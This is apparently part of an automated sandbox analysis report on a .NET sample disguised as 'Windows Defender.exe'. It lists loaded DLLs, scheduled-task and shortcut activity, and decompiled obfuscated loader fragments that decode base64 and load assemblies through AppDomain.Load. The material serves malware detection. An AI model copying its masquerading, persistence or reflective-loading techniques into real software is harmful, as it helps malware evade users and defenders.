                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Windows Defender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Windows Defender.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Windows Defender.lnk.0.dr | LNK file: ..\..\..\..\..\..\Local\Windows Defender.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Windows Defender.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Windows Defender.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.CZPe3SyONWjc5hj7Zt6pMdbenXpaXikMlYpqDKafLkOms,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.zZKdF8cP7z9HFwFLRzzYTFQciU5MLuHHC6ENIjMkVQdXq,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.uwhBvO1fbcTMCs5cpy4a3GxWkUK9nOFUAjU5tbLzxc4Nm,HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad._5u2o12FB2HiDfSgNUYqkFFRVaw4aYHm8E3UpGOPhPKmwt,lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.zhcMYZF0QInpk1kT5sx0pNbXx64NrJThadiT87lCJABNsLFSAdhLLgBrOIoBM5pw3c3TJwachr4ojYs0LVrQgMiixm9P0n()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2],lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.LytLH5HEpuu4OIZ4MZsfCpCesChmU0ZjVIJ8b1hISUzFK3SckjwTfifsxmOb9YgG9vGxixmqOMdF76qpemglcmyKbAAsfo(Convert.FromBase64String(kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { kP8naPsDEdt3KCHnv9GqttgTX3pGruI7tMADa4O9Wf7arGbQRnEi9d5VnHvKfr[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac System.AppDomain.Load(byte[])
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP System.AppDomain.Load(byte[])
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3456D2A5 pushad ; iretd 2_2_00007FFD3456D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34752316 push 8B485F92h; iretd 2_2_00007FFD3475231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3457D2A5 pushad ; iretd 5_2_00007FFD3457D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3469C2C5 push ebx; iretd 5_2_00007FFD3469C2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34762316 push 8B485F91h; iretd 5_2_00007FFD3476231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD3454D2A5 pushad ; iretd 9_2_00007FFD3454D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34732316 push 8B485F94h; iretd 9_2_00007FFD3473231B
                      Source: Windows Defender.exe, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csHigh entropy of concatenated method names: 'Rute6Q5WfZvWUrj7yB49O777GXEBlczDv32ghc0AuKl7Eq7f8AlSx1K9UCYrTt8Enkzd00PAsgvJ2GaG', 'vqoXLxMurja5P63uVjV19ePPqazR47SDPa4UttMMpdIMsmJvdOHzWCZvJ5ssFQQrrO5l8H1Beh9lbFzh', 'btUmetsTApatkGtIV7Ar85mhuWhty6TScMcbnp4Bc0EWVLzoXJ3MXttQG85E0Mw6r08Bg0gK7F0sIPyW', '_9ilAP0cixqahHu4GEVeQDwOxsqe8x1q8PisWnM9J5eCC4xT42SCNWJE9AfMDBxZUoBnkzXZowCDwicnO'
                      Source: Windows Defender.exe, zkQvGS0CbJWVNQzX5NTER9jKP2wULDi4d7anVMwHXLqxt2Tfv4P79Ovl8LhrrbpRTAHRggLj6diBqOcOOQp4tkjEnPEJC5.csHigh entropy of concatenated method names: 'Cf727bOR7tmg52RUOBjzXXW07BvwwusAZeXWQUbfS5TSAxiVeQ85Di2K7cjskToFklKtP27kh7hRErq6t1aiZtwj317DKD', 'b6Gpmr1a6DLZ0iQe5PQiXjfDgwJTVCs85bzz2miyfWUF6ZRelk5mmW9pV8b6qnqAbqQSpFjHJARDeNsHMmmBH7GM7x1Ilf', 'WWYaGiEOPbQrDeeuEOh96p36J4l3CXXUW6My42JCfgnmJ6ldEdCgyPyaIEYUIAEqZMQw3SqhV3VmScsgVvnifDENPzrzDv', 'KCHtc1PRa2W2WF8Vo67k5A', 'CS2hsHRh3siCbOd6p2HOda', 'dhPyQmjAH02BwSBgb7Jf05', 'WuvOV43onvRsDtNiqMWHAw', 'AS5Nn37UDDwO0zKIdLK7gm', '_8ULcALNWa2tKQ9ZwieNluI', 'SfeiZ7WsOxTSvCI8uMI0Yg'
